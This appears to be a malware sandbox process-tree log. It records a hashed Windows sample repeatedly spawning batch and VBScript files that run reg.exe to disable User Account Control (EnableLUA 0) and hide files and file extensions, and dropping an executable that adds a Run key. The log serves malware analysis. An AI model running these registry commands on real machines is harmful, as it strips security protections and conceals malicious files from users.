C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WCEgcIUI.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
76⤵
PID:4232

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
77⤵
PID:2704

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
76⤵
PID:3992

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
76⤵
PID:8

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
74⤵
- Modifies registry key
PID:2744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IuwskEEo.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
74⤵
PID:1848

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
75⤵
PID:3892

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
74⤵
- UAC bypass
PID:4276

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
74⤵
PID:3904

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
72⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FUokMIMc.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
72⤵
PID:2408

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
73⤵
PID:4908

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
72⤵
- UAC bypass
PID:5016

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
72⤵
PID:4984

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
70⤵
- Modifies visibility of file extensions in Explorer
PID:4688

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
70⤵
PID:2068

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
70⤵
- UAC bypass
PID:4824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ACQogEkM.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
70⤵
PID:4644

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
71⤵
PID:4480

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
68⤵
PID:4652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KOcYUQog.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
68⤵
PID:3220

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
69⤵
PID:4884

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
68⤵
- UAC bypass
- Modifies registry key
PID:3040

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
68⤵
PID:3972

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
66⤵
- Modifies registry key
PID:1492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\quIYkoMo.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
66⤵
PID:2780

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
67⤵
PID:3472

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
66⤵
PID:4728

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
66⤵
PID:3876

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
64⤵
- Modifies visibility of file extensions in Explorer
PID:2828

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
64⤵
PID:496

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
64⤵
- UAC bypass
PID:3868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nuwUAkws.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
64⤵
PID:3824

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
65⤵
PID:3936

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
62⤵
- Modifies registry key
PID:4640

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
62⤵
- Modifies visibility of file extensions in Explorer
PID:3804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tWcsQQIo.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
62⤵
PID:3200

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
63⤵
PID:3496

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
62⤵
- UAC bypass
PID:3984

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
60⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XKAYMEYo.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
60⤵
PID:3852

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
61⤵
PID:4496

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
60⤵
PID:1308

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
60⤵
- Modifies registry key
PID:4284

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
58⤵
PID:4144

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
58⤵
- Modifies visibility of file extensions in Explorer
PID:3300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQQksgks.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
58⤵
PID:1312

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
59⤵
PID:868

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
58⤵
- UAC bypass
PID:2736

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
56⤵
PID:328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bigwsIcg.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
56⤵
PID:3588

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
57⤵
PID:3388

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
56⤵
- UAC bypass
PID:748

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
56⤵
PID:4764

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
54⤵
- Modifies visibility of file extensions in Explorer
PID:3796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CCUQAUwU.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
54⤵
PID:1500

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
55⤵
PID:1560

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
54⤵
- UAC bypass
- Modifies registry key
PID:2568

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
54⤵
PID:3432

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
52⤵
- Modifies registry key
PID:1160

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
52⤵
PID:2772

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
52⤵
PID:2108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RggAYcIk.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
52⤵
PID:3868

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
53⤵
PID:4240

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
50⤵
- Modifies visibility of file extensions in Explorer
PID:3476

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
50⤵
- Modifies registry key
PID:4008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fykEMgcU.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
50⤵
PID:2224

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
51⤵
PID:3652

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
50⤵
- UAC bypass
PID:3428

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
48⤵
- Modifies visibility of file extensions in Explorer
PID:4656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
48⤵
PID:3040

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
48⤵
- UAC bypass
PID:3420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HosIwEcs.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
48⤵
PID:3704

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
49⤵
PID:948

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
46⤵
PID:5060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zwYYIcgE.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
46⤵
PID:3732

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
47⤵
PID:4900

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
46⤵
- UAC bypass
PID:2036

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
46⤵
PID:4548

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
44⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yQUwIkMc.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
44⤵
PID:4508

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
45⤵
PID:4620

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
44⤵
PID:4164

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
44⤵
PID:3136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xaAssMEc.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
42⤵
PID:4860

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
43⤵
PID:3432

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
42⤵
- UAC bypass
PID:1388

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
42⤵
PID:2496

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
42⤵
- Modifies visibility of file extensions in Explorer
PID:3416

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
40⤵
PID:1564

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
40⤵
- Modifies registry key
PID:3904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uSEoscow.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
40⤵
PID:2352

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
41⤵
PID:3760

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
40⤵
PID:4568

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
38⤵
- Modifies visibility of file extensions in Explorer
PID:1140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bYQkkwEE.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
38⤵
PID:4376

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
39⤵
PID:5032

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
38⤵
PID:592

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
38⤵
PID:2728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vAQUokIE.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
36⤵
PID:4316

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
37⤵
PID:3808

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
36⤵
- UAC bypass
PID:3300

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
36⤵
PID:4536

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
36⤵
- Modifies visibility of file extensions in Explorer
PID:208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
34⤵
PID:3124

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
34⤵
- Modifies visibility of file extensions in Explorer
PID:520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kuQgMwkg.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
34⤵
PID:5004

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
35⤵
PID:2736

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
34⤵
PID:3840

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
32⤵
- Modifies visibility of file extensions in Explorer
PID:1560

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
32⤵
PID:4100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GAgAgwMM.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
32⤵
PID:3004

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
33⤵
PID:2656

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
32⤵
- UAC bypass
PID:5016

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
30⤵
PID:4488

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
30⤵
PID:3812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WogQswss.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
30⤵
PID:4560

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
31⤵
PID:2712

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
30⤵
- UAC bypass
PID:3836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\USUkIosQ.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
28⤵
PID:3572

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
29⤵
PID:3804

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
28⤵
PID:1308

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
28⤵
PID:2084

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
28⤵
PID:2744

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
26⤵
PID:4916

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
26⤵
- UAC bypass
PID:3984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VgMMsMMQ.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
26⤵
PID:3644

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
27⤵
PID:3748

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
26⤵
PID:4844

C:\ProgramData\saEgQgMs\EAwYIQgk.exe
"C:\ProgramData\saEgQgMs\EAwYIQgk.exe"
26⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5000

C:\Windows\SysWOW64\taskkill.exe
taskkill /FI "USERNAME eq Admin" /F /IM xsMYUowA.exe
27⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wUkcgYAQ.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
24⤵
PID:4824

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
25⤵
PID:1492

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
24⤵
PID:948

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
24⤵
PID:1944

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
24⤵
PID:2856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uOEkscsg.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
22⤵
PID:3892

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
23⤵
PID:2356

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
22⤵
PID:3484

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
22⤵
PID:4008

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
22⤵
- Modifies visibility of file extensions in Explorer
PID:3652

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
20⤵
PID:2188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eQAAcQsg.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
20⤵
PID:2608

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
21⤵
PID:4400

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
20⤵
- UAC bypass
PID:3316

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
20⤵
- Modifies registry key
PID:2084

